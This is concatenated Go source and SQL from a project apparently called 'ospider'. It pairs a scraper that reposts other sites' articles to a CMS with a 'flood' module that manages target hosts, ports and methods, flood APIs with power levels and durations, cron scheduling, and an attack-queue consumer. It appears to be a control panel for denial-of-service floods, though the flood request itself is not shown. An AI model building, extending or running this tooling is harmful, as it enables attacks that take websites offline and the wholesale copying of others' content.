defer consumer.content.Ospider.P.Close(redisClient)
consumer.content.Log.Printf("get redis client fails %s", err)
}
if reviewStr, err = redisClient.Get(site.Rule.Url); err != nil {
consumer.content.Log.Printf("not foud history data in review data for key:%s", site.Rule.Url)
spider, ext := NewSpiderContent(consumer.content.Cfg, attach)
if err := spider.Run(site.Rule.Url); err != nil {
consumer.content.Log.Printf("spider find content fails %s", err)
site = ext.Attach["site"].(handler.Site)
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
//写入redis-历史记录
if redisClient, err := consumer.content.Ospider.P.Get(); err != nil {
defer consumer.content.Ospider.P.Close(redisClient)
consumer.content.Log.Printf("get redis client fails %s", err)
} else {
redisClient.Set(site.Rule.Url, string(siteStr))
redisClient.Expire(site.Rule.Url, 60*60*48)
}
}
}
} else {
if err = json.Unmarshal([]byte(reviewStr), &review); err != nil {
consumer.content.Log.Printf("json Unmarshal fails %s", err)
} else {
if (review.Id & site.Id) != site.Id {
site.Rule.Selector.Title = review.Rule.Selector.Title
site.Rule.Selector.Content = review.Rule.Selector.Content
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
}
//更新review的id和url
review.Id |= site.Id
review.Url += site.Url
if reviewBytes, err := json.Marshal(review); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
redisClient.Set(site.Rule.Url, string(reviewBytes))
redisClient.Expire(site.Rule.Url, 60*60*consumer.content.CacheExpire)
}
} else if !strings.Contains(review.Url, site.Url) {
site.Rule.Selector.Title = review.Rule.Selector.Title
site.Rule.Selector.Content = review.Rule.Selector.Content
if siteStr, err := json.Marshal(site); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
resultQueue.Publish(string(siteStr))
}
//更新review的id和url
review.Id |= site.Id
review.Url += site.Url
if reviewBytes, err := json.Marshal(review); err != nil {
consumer.content.Log.Printf("site Marshal fails %s", err)
} else {
redisClient.Set(site.Rule.Url, string(reviewBytes))
redisClient.Expire(site.Rule.Url, 60*60*consumer.content.CacheExpire)
}
}
}
}
delivery.Ack()
}
func (self TaskContent) Handler() {
var (
linkQueue rmq.Queue
)
linkQueue = self.Connection.OpenQueue(self.Cfg.LinkQueueName)
linkQueue.StartConsuming(self.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
linkQueue.AddConsumer(name, NewConsumerLink(i, self))
}
}
<file_sep>package crontab
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
"encoding/binary"
)
type Rest struct {
common.Ospider
Cfg
}
func NewRest() *Rest {
return &Rest{}
}
func (self *Rest) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.RestCron)
c.AddFunc(self.RestCron, func() {
var (
api handler.FloodApi
powerlevel uint32
time uint32
)
self.Log.Println("rest powerlevel and time...")
sqlStr := `select id, name, api, powerlevel, time
from spider_flood_api where status = 1`
stmtOut, err := self.Db.Prepare(sqlStr)
defer stmtOut.Close()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
rows, err := stmtOut.Query()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
for rows.Next() {
err = rows.Scan(&api.Id, &api.Name, &api.Api, &api.Powerlevel, &api.Time)
if err != nil {
self.Log.Printf("rows.Scan (%s) fails %s", sqlStr, err)
return
}
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint64(powerlevelBuf, uint64(api.Powerlevel))
powerlevel = binary.BigEndian.Uint32(powerlevelBuf[:4])
binary.BigEndian.Uint32(powerlevelBuf[4:])
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint64(timeBuf, uint64(api.Time))
time = binary.BigEndian.Uint32(timeBuf[:4])
binary.BigEndian.Uint32(timeBuf[4:])
sqlStr = `update spider_flood_api set time = ?, powerlevel = ? where id = ?`
stmtIn, err := self.Db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
binary.BigEndian.PutUint32(powerlevelBuf[4:], powerlevel)
binary.BigEndian.PutUint32(timeBuf[:4], time)
binary.BigEndian.PutUint32(timeBuf[4:], time)
newPowerlevel := binary.BigEndian.Uint64(powerlevelBuf)
newTime := binary.BigEndian.Uint64(timeBuf)
self.Log.Printf("powerlevel:%d-%d time:%d-%d", powerlevel, newPowerlevel, time, newTime )
_, err = stmtIn.Exec(newTime, newPowerlevel, api.Id)
if err != nil {
self.Log.Printf("update flood api fails %s", err)
return
}
}}, "initTask")
c.Start()
}
<file_sep>package crontab
import (
"encoding/json"
"fmt"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
cron "github.com/jakecoffman/cron"
)
type Cfg struct {
common.Cfg
FlushCron string `json:"flushCron"`
RestCron string `json:"restCron"`
}
type Task struct {
common.Ospider
Cfg
rmq.Queue
}
func New() *Task {
return &Task{}
}
func (self *Task) Handler() {
c := cron.New()
subCron := cron.New()
subCron.Start()
self.Log.Println(self.FlushCron)
c.AddFunc(self.FlushCron, func() {
sqlStr := `select a.id, a.uid, a.name, a.url, a.document_set,
a.ruleid, b.name, b.spiderid,b.url, b.rule_json,
a.cronid, c.name, c.cron, d.id, d.name, d.queue_name_json, a.status
from spider_site a left join spider_rule b on a.ruleid = b.id
left join spider_crontab c on a.cronid = c.id
left join spider_manager d on b.spiderid = d.id`
stmtOut, err := self.Db.Prepare(sqlStr)
defer stmtOut.Close()
if err != nil {
self.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
return
}
var (
site handler.Site
)
rows, err := stmtOut.Query()
defer rows.Close()
if err != nil {
self.Log.Printf("stmtOut.Query fails %s", err)
return
}
for rows.Next() {
if err := rows.Scan(&site.Id, &site.Uid, &site.Name, &site.Url, &site.DocumentSetStr, &site.Rule.Id,
&site.Rule.Name, &site.Rule.SpiderId, &site.Rule.Url, &site.Rule.SelectorStr,
&site.Crontab.Id, &site.Crontab.Name, &site.Crontab.Cron, &site.Rule.Manager.Id,
&site.Rule.Manager.Name, &site.Rule.Manager.QueueNameStr, &site.Status); err != nil {
self.Log.Printf("rows.Scan fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.DocumentSetStr), &site.DocumentSet); err != nil {
self.Log.Printf("Unmarshal DocumentSetStr to DocumentSet fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.Rule.SelectorStr), &site.Rule.Selector); err != nil {
self.Log.Printf("Unmarshal SelectorStr to Selector fails %s", err)
return
}
if err := json.Unmarshal([]byte(site.Rule.Manager.QueueNameStr), &site.Rule.Manager.QueueName); err != nil {
self.Log.Printf("Unmarshal SelectorStr to Selector fails %s", err)
return
}
siteJson, _ := json.Marshal(site)
subCron.RemoveJob(fmt.Sprintf("%d", site.Id))
if site.Status != 1 {
continue
}
subCron.AddFunc(site.Crontab.Cron, func() {
self.Log.Println(site.Crontab.Cron)
self.Log.Printf("%s", siteJson)
//写入redis队列
if !self.Publish(string(siteJson)) {
self.Log.Printf("put in task queue fails")
}
}, fmt.Sprintf("%d", site.Id))
}
}, "initTask")
c.Start()
}
<file_sep>package cms
import (
"encoding/json"
"net/http"
"strings"
"time"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
)
type CommitRestful struct {
common.Ospider
}
type Document struct {
Uid int64 `json:"uid"`
Title string `json:"title"`
Category int64 `json:"category_id"`
Group int64 `json:"group_id"`
Model int64 `json:"model_id"`
Position int64 `json:"position"`
Display int64 `json:"display"`
Status int64 `json:"status"`
Create int64 `json:"create_time"`
Update int64 `json:"update_time"`
}
type Article struct {
Id int64 `json:"id"`
Content string `json:"content"`
}
type DocumentArticle struct {
Document `json:"document"`
Article `json:"article"`
}
func NewCommitRestful(co common.Ospider) *CommitRestful {
return &CommitRestful{co}
}
func (self *CommitRestful) Process(payload string) {
var (
site handler.Site
documentArticle DocumentArticle
resultJson []byte
err error
)
if err = json.Unmarshal([]byte(payload), &site); err != nil {
self.Log.Printf("json Unmarshal fails %s", err)
return
}
//
documentArticle.Article.Content = site.Rule.Selector.Content
documentArticle.Document.Category = site.DocumentSet.Category
documentArticle.Document.Display = site.DocumentSet.Display
documentArticle.Document.Group = site.DocumentSet.GroupId
documentArticle.Document.Model = site.DocumentSet.ModelId
documentArticle.Document.Position = site.DocumentSet.Position
documentArticle.Document.Status = site.DocumentSet.Check
documentArticle.Document.Title = site.Rule.Selector.Title
documentArticle.Document.Uid = site.Uid
documentArticle.Document.Create = time.Now().Unix()
documentArticle.Document.Update = time.Now().Unix()
if resultJson, err = json.Marshal(documentArticle); err != nil {
self.Log.Printf("json Marshal fails %s", err)
return
}
client := &http.Client{}
req, _ := http.NewRequest("POST", site.Url + "/api/document/article", strings.NewReader(string(resultJson)))
req.Header.Set("Content-Type", "application/json")
resp, err := client.Do(req)
defer resp.Body.Close()
self.Log.Printf("commit resuful:[%d]:%s", resp.StatusCode, site.Url + "/document/article")
// {"document":{"uid:":1,"title":"test112","category_id":42,"group_id":0,"model_id":2,"position":4,"display":1,"status":1},
// "article":{"id":,"content":"adfdsafsafsd"}}
}
<file_sep>/*
-- Query: SELECT * FROM ospider.sp_menu_template
LIMIT 0, 100
-- Date: 2016-06-20 10:20
*/
INSERT INTO `sp_menu_template` (`id`,`title`,`name`,`logtime`) VALUES (2,'API管理','floodapiview','2016-06-20 05:13:19');
INSERT INTO `sp_menu_template` (`id`,`title`,`name`,`logtime`) VALUES (2,'目标管理','floodtargetview','2016-06-20 05:13:19');
<file_sep>package processor
import (
"net/http"
"net/url"
"time"
"github.com/PuerkitoBio/gocrawl"
"github.com/PuerkitoBio/goquery"
"github.com/huzorro/ospider/crontab"
"github.com/huzorro/ospider/web/handler"
// "fmt"
"bytes"
"io/ioutil"
"golang.org/x/net/html/charset"
"golang.org/x/text/transform"
)
type Cfg struct {
crontab.Cfg
CrawlDelay int64 `json:"spiderDelaySecond"`
MaxVisits int `json:"maxVisits"`
UserAgent string `json:"userAgent"`
//并发控制
ActorNums int64 `json:"actorNums"`
LinkQueueName string `json:"linkQueueName"`
}
type ExtLink struct {
Cfg
*gocrawl.DefaultExtender
Attach map[string]interface{}
}
func NewSpiderLink(cfg Cfg, attach map[string]interface{}) (*gocrawl.Crawler, *ExtLink) {
//attach := make(map[string]interface{})
ext := &ExtLink{cfg, &gocrawl.DefaultExtender{}, attach}
// fmt.Println(ext.Attach)
// Set custom options
opts := gocrawl.NewOptions(ext)
opts.CrawlDelay = 1 * time.Second
opts.LogFlags = gocrawl.LogAll
opts.SameHostOnly = true
opts.MaxVisits = cfg.MaxVisits
opts.UserAgent = cfg.UserAgent
return gocrawl.NewCrawlerWithOptions(opts), ext
}
func (e *ExtLink) Visit(ctx *gocrawl.URLContext, res *http.Response, doc *goquery.Document) (interface{}, bool) {
//获取字符集
var (
body []byte
err error
)
if body, err = ioutil.ReadAll(res.Body); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response body read fails")
return nil, true
}
encoding, charset, is := charset.DetermineEncoding(body, "utf-8")
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response charset is "+charset)
site := e.Attach["site"].(handler.Site)
var links []string
if len(site.Rule.Selector.Href) <= 0 {
site.Rule.Selector.Href = "a[href]"
}
doc.Find(site.Rule.Selector.Section).
Find(site.Rule.Selector.Href).
Each(func(i int, s *goquery.Selection) {
href, _ := s.Attr("href")
//编码转换
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(href)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
href = string(u)
}
}
//处理相对路径
u, _ := url.Parse(href)
if !u.IsAbs() {
u.Host = ctx.URL().Host
u.Scheme = ctx.URL().Scheme
u.RawQuery = u.Query().Encode()
href = u.String()
}
if len(href) > 0 {
links = append(links, href)
}
})
e.Attach["links"] = links
return nil, true
}
func (e *ExtLink) Filter(ctx *gocrawl.URLContext, isVisited bool) bool {
return !isVisited
}
<file_sep>package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/common"
"time"
"net"
)
type FloodTarget struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Url string `json:"url"`
Host string `json:"host"`
Port string `json:"port"`
Method string `json:"method"`
Powerlevel int64 `json:"powerlevel"`
Time int64 `json:"time"`
Crontab Crontab `json:"Cron"`
Status int64 `json:"status"`
Uptime string `json:"uptime"`
Logtime string `json:"logtime"`
}
type FloodTargetRelation struct {
FloodTarget
user.SpStatUser
}
func GetFloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
log.Printf("group private erros")
}
sqlStr := `select a.id, a.uid, a.url, a.host, a.port, a.method, a.powerlevel, a.time, a.cronid,
b.name, a.status, a.uptime, a.logtime from spider_flood_target a
left join spider_crontab b on a.cronid = b.id where ` + con + " a.id = ?"
stmtOut, err := db.Prepare(sqlStr)
id, _ := strconv.Atoi(r.PostFormValue("Id"))
rows, err := stmtOut.Query(id)
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if rows.Next() {
if err := rows.Scan(&floodTarget.Id, &floodTarget.Uid, &floodTarget.Url,
&floodTarget.Host, &floodTarget.Port, &floodTarget.Method,
&floodTarget.Powerlevel, &floodTarget.Time, &floodTarget.Crontab.Id, &floodTarget.Crontab.Name,
&floodTarget.Status,&floodTarget.Uptime, &floodTarget.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(floodTarget); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditfloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&floodTarget).Elem()
rValue := reflect.ValueOf(&floodTarget).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
floodTarget.Crontab.Id, _ = strconv.ParseInt(r.PostFormValue("CronId"), 10, 64)
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `update spider_flood_target set url = ?, host = ?, cronid = ?, status = ?
where id = ? and uid = ?`
stmtIn, err := db.Prepare(sqlStr)
defer func () {
stmtIn.Close()
}()
if _, err = stmtIn.Exec(floodTarget.Url, floodTarget.Host, floodTarget.Crontab.Id,
floodTarget.Status, floodTarget.Id, spUser.Id); err != nil {
log.Printf("update spider fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func AddfloodTarget(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
floodTarget FloodTarget
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&floodTarget).Elem()
rValue := reflect.ValueOf(&floodTarget).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
log.Printf("unknow type %s", p)
}
}
}
if floodTarget.Url == "" || r.PostFormValue("CronId") == "" {
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if floodTarget.Host == "" {
ips, err := net.LookupIP(floodTarget.Url)
if err != nil {
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
floodTarget.Host = ips[0].String()
}
floodTarget.Crontab.Id, _ = strconv.ParseInt(r.PostFormValue("CronId"), 10, 64)
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
sqlStr := `insert into spider_flood_target(uid, url, host, cronid, logtime)
values(?, ?, ?, ?, ?)`
stmtIn, err := db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
log.Printf("db prepare fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if _, err := stmtIn.Exec(spUser.Id, floodTarget.Url, floodTarget.Host,
floodTarget.Crontab.Id, time.Now().Format("2006-01-02 15:04:05")); err != nil {
log.Printf("stmtIn exec fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
s.Status = "200"
s.Text = "操作成功"
js, _ = json.Marshal(s)
return http.StatusOK, string(js)
}
func GetfloodTargets(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
cfg *common.Cfg, session sessions.Session, ms []*user.SpStatMenu, render render.Render) {
var (
floodTargetRelation *FloodTargetRelation
floodTargetRelations []*FloodTargetRelation
menu []*user.SpStatMenu
spUser user.SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
con = "where a.status in(0, 1, 3, 5) "
case user.GROUP_PRI_ALLOW:
con = "WHERE a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and a.status in(0, 1) "
case user.GROUP_PRI_BAN:
con = "WHERE a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and a.status in(0, 1) "
default:
log.Printf("group private erros")
}
for _, elem := range ms {
if (spUser.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM spider_flood_target a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
sqlStr := `select a.id, a.uid, b.username, a.url, a.host, a.cronid, c.name, a.status, a.logtime
from spider_flood_target a left join sp_user b on a.uid = b.id
left join spider_crontab c on a.cronid = c.id
` + con + `order by id desc limit ?, ?`
log.Printf("%s", sqlStr)
stmtOut, err = db.Prepare(sqlStr)
defer stmtOut.Close()
rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
defer rows.Close()
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
for rows.Next() {
floodTargetRelation = &FloodTargetRelation{}
if err := rows.Scan(&floodTargetRelation.FloodTarget.Id,&floodTargetRelation.FloodTarget.Uid,
&floodTargetRelation.SpStatUser.UserName, &floodTargetRelation.FloodTarget.Url,
&floodTargetRelation.FloodTarget.Host, &floodTargetRelation.FloodTarget.Crontab.Id,
&floodTargetRelation.FloodTarget.Crontab.Name, &floodTargetRelation.FloodTarget.Status,
&floodTargetRelation.FloodTarget.Logtime); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
return
}
floodTargetRelations = append(floodTargetRelations, floodTargetRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*user.SpStatMenu
Result []*FloodTargetRelation
Paginator *util.Paginator
User *user.SpStatUser
}{menu, floodTargetRelations, paginator, &spUser}
if path == "/" {
render.HTML(200, "floodtargetview", ret)
} else {
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
}<file_sep>package attack
import (
"fmt"
"time"
"github.com/adjust/rmq"
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/spider/processor"
)
type Consumer struct {
name string
count int
before time.Time
task *Task
}
type Task struct {
Cfg processor.Cfg
common.Ospider
rmq.Connection
Processors []common.Processor
}
func NewConsumer(tag int, task *Task) *Consumer {
c := &Consumer{
name: fmt.Sprintf("consumer%d", tag),
count: 0,
before: time.Now(),
task: task,
}
return c
}
func (self *Task) AddProcessor(p common.Processor) *Task {
self.Processors = append(self.Processors, p)
return self
}
func (consumer *Consumer) Consume(delivery rmq.Delivery) {
consumer.count++
elem := delivery.Payload()
delivery.Ack()
consumer.task.Log.Printf("%s consumed %d %s", consumer.name, consumer.count, elem)
for _, p := range consumer.task.Processors {
p.Process(elem)
}
}
func (self *Task) Handler() {
var (
resultQueue rmq.Queue
)
resultQueue = self.Connection.OpenQueue(self.Cfg.AttackQueueName)
resultQueue.StartConsuming(self.Cfg.UnackedLimit, 500*time.Millisecond)
for i := 0; i < self.Cfg.NumConsumers; i++ {
name := fmt.Sprintf("consumer %d", i)
resultQueue.AddConsumer(name, NewConsumer(i, self))
}
}
<file_sep>/*
-- Query: SELECT * FROM ospider.sp_node_privilege where logtime > "2016-06"
LIMIT 0, 100
-- Date: 2016-06-20 10:06
*/
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api添加','/floodapi/add','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api编辑','/floodapi/edit','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'获取单个api','/floodapi/one','2016-06-20 00:55:03');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'api列表','/floodapiview','2016-06-20 01:07:48');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标添加','/floodtarget/add','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标编辑','/floodtarget/edit','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'获取单个目标','/floodtarget/one','2016-06-20 05:18:14');
INSERT INTO `sp_node_privilege` (`id`,`name`,`node`,`logtime`) VALUES (4,'目标列表','/floodtargetview','2016-06-20 05:18:14');
<file_sep>package processor
import (
"bytes"
"io/ioutil"
"net/http"
"time"
"github.com/PuerkitoBio/gocrawl"
"github.com/PuerkitoBio/goquery"
"github.com/huzorro/ospider/web/handler"
"golang.org/x/net/html/charset"
"golang.org/x/text/transform"
"strings"
"net/url"
)
type ExtContent struct {
Cfg
*gocrawl.DefaultExtender
Attach map[string]interface{}
}
func NewSpiderContent(cfg Cfg, attach map[string]interface{}) (*gocrawl.Crawler, *ExtContent) {
//attach := make(map[string]interface{})
ext := &ExtContent{cfg, &gocrawl.DefaultExtender{}, attach}
// Set custom options
opts := gocrawl.NewOptions(ext)
opts.CrawlDelay = 1 * time.Second
opts.LogFlags = gocrawl.LogAll
opts.SameHostOnly = true
opts.MaxVisits = cfg.MaxVisits
opts.UserAgent = cfg.UserAgent
return gocrawl.NewCrawlerWithOptions(opts), ext
}
func (e *ExtContent) Visit(ctx *gocrawl.URLContext, res *http.Response, doc *goquery.Document) (interface{}, bool) {
//获取字符集
var (
body []byte
err error
htmls = make([]string, 0)
)
if body, err = ioutil.ReadAll(res.Body); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response body read fails")
return nil, true
}
encoding, charset, is := charset.DetermineEncoding(body, "utf-8")
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "response charset is " + charset)
site := e.Attach["site"].(handler.Site)
site.Rule.Selector.Title = doc.Find(site.Rule.Selector.Title).Text()
//编码转换
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(site.Rule.Selector.Title)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
site.Rule.Selector.Title = string(u)
}
}
if len(site.Rule.Selector.Filter) > 0 {
doc.Find(site.Rule.Selector.Content).
Not(site.Rule.Selector.Filter).
Each(func(i int, q *goquery.Selection){
shtml, _ := q.Html()
htmls = append(htmls, shtml)
})
} else {
doc.Find(site.Rule.Selector.Content).
Each(func(i int, q *goquery.Selection){
shtml, _ := q.Html()
htmls = append(htmls, shtml)
})
}
site.Rule.Selector.Content = strings.Join(htmls, "<br/>")
//编码转换
if !is {
reader := transform.NewReader(bytes.NewReader([]byte(site.Rule.Selector.Content)), encoding.NewDecoder())
if u, err := ioutil.ReadAll(reader); err != nil {
e.Log(gocrawl.LogAll, gocrawl.LogInfo, "io read all fails"+err.Error())
} else {
site.Rule.Selector.Content = string(u)
}
}
//处理img的相对路径问题
sub, _ := goquery.NewDocumentFromReader(bytes.NewReader([]byte(strings.Join(htmls, ""))))
sub.Find("img").Each(func(i int, q *goquery.Selection) {
src, _ := q.Attr("src")
u, _ := url.Parse(src)
if !u.IsAbs() {
u.Host = ctx.URL().Host
u.Scheme = ctx.URL().Scheme
u.RawQuery = u.Query().Encode()
dest := u.String()
site.Rule.Selector.Content = strings.Replace(site.Rule.Selector.Content, src, dest, -1)
}
})
e.Attach["site"] = site
return nil, true
}
func (e *ExtContent) Filter(ctx *gocrawl.URLContext, isVisited bool) bool {
return !isVisited
}
<file_sep>package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type Selector struct {
Title string `json:"title"`
Content string `json:"content"`
Section string `json:"section"`
Href string `json:"href"`
Filter string `json:"filter"`
}
type Rule struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
SpiderId int64 `json:"spiderid"`
Manager Manager `json:"manager"`
Url string `json:"url"`
Selector Selector `json:"selector"`
SelectorStr string `json:"selectorStr"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type RuleRelation struct {
Rule
user.SpStatUser
}
func GetRulesApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
spUser user.SpStatUser
rule Rule
rules []Rule
js []byte
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
log.Printf("session stroe type error")
http.Redirect(w, r, user.ERROR_PAGE_NAME, 301)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = "WHERE uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and status = 1"
case user.GROUP_PRI_BAN:
con = "WHERE uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and status =1"
default:
log.Printf("group private erros")
}
sqlStr := `select id, uid, name, spiderid, url, rule_json,status, logtime from spider_rule ` + con
stmtOut, err := db.Prepare(sqlStr)
rows, err := stmtOut.Query()
defer func () {
stmtOut.Close()
rows.Close()
}()
if err != nil {
log.Printf("%s", err)
